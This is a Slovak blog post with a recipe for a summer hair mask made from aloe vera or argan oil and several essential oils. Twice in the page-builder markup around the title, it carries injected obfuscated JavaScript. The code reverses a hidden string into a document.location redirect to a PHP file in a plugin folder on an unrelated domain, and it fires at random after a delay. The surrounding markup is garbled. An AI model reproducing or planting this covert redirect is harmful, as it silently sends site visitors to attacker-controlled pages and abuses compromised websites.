<“h1″ class="w-post-elm post_title us_custom_f5286e8b entry-title" itemprop="headline">Esenciálne oleje na vlasy – recept pre krásne vlasy aj v lete) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom%22%3A%220.5rem%22%2C%22font-family%22%3A%22h1%22%7D%7D“]
Nekomentované
[us_separator size=“small“]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom%22%3A%221.5rem%22%7D%7D“]

Cítite aj vy aké sú vlasy namáhané a suchšie počas leta? Esenciálne oleje na vlasy spolu s ďalšími skvelými prírodnými pomocníkmi pomôžu dopriať im zaslúženú výživu.

Leto máme v plnom prúde a ja verím, že si vychutnávate chvíle voľna a ešte stále dlhé teplé večery. Slniečko je pre nás v lete obrovským darom vitamínu D a energie. Netreba však zabúdať aj na zvýšenú starostlivosť o svoju pokožku a aj vlasy, aby sme skutočne cítili len výhody tohto krásneho ročného obdobia. Ja mám vždy pocit, že práve vlasy sú korunou krásy každej ženy, a preto vám dnes ponúkam recept ako využiť esenciálne oleje na vlasy a zachovať tak ich krásu aj v lete.

Vlasy sú počas leta namáhané práve pre množstvo slnka, suchého vzduchu a tiež častého kúpania. To znamená časté vystavovanie chlórovej vode, alebo v tom lepšom prípade slanej vode. Počas horúcich dní tiež nosenie klobúka, čo ale veľmi podporujem…milujem ten pocit elegancie a ženskosti, vy nie? A k tomu bonus súkromného tieňa a ochrany pleti, ideálne spojenie.

Ale späť k esenciálnym olejom na vlasy. Ponúkam vám recept na vynikajúcu jednoduchú domácu masku. Spojenie účinkov vybraných rastlinných olejov s esenciálnymi olejmi udrží vaše vlasy šťastné a zdravé. Táto zmes olejov je neuveriteľne omladzujúca a zanechá vám revitalizovanú pokožku hlavy aj vlasy.

Najprv si pripravíme základ:

  1. Ak doma pestujete aloe vera, použite dužinu z jedného listu a rozmixujte ju v malej nádobe do peny. Ak nemáte domáce aloe vera, môžete použiť aloe vera gél alebo šťavu. Následne pridajte čajovú lyžičku kokosového oleja a nechajte odstáť približne 10 minút.

Alebo si poďte dopriať skutočnú dávku luxusu a:

  1. Použite ako základ 30 ml argánového oleja. Argánový olej, ktorý ja používam je certifikovaný ako ekologický a 100% prírodný. Získava sa lisovaním za studena zo semien ovocia – ktoré sa podobá olivám – argánového stromu. Pochádza z Maroka a aj z vlastných skúseností potvrdím, že jeho označenie „tekuté zlato“ je skutočne oprávnené. Arganový olej je prírodný prostriedok proti starnutiu, bohatý na antioxidanty a vitamín E a užitočný zvlhčovač, ktorý sa dá používať od hlavy až po päty. Je to skutočne prírodný zázrak sveta.
[us_separator]

Na koniec si do základu pridajte esenciálne oleje:

3 kvapky Rozmarínový esenciálny olej

3 kvapky Esenciálny olej z Cédrového dreva

3 kvapky Esenciálny olej Levanduľa

3 kvapky Mätový esenciálny olej

Postup pre očarujúcu korunu krásy

Vmasírujte veľkorysé množstvo tejto zmesi do pokožky hlavy prstami, jemnými krúživými pohybmi. Naneste až po konce vlasov, aby ste stimulovali vlasové folikuly a vyživili vašu pokožku hlavy a vlasy v celej ich kráse a dĺžke. Nechajte pôsobiť 1 – 2 hodiny alebo cez noc. Následne si vlasy umyte obľúbeným šampónom. A hotovo! Vyživené a silné vlasy, so zdravou pokožkou hlavy sú vaše. Odporúčam opakovať túto voňavú procedúru približne 2-krát do mesiaca. Toľko si predsa naša koruna krásy zaslúži. Vyskúšajte a napíšte mi, ako vám to funguje.

Menu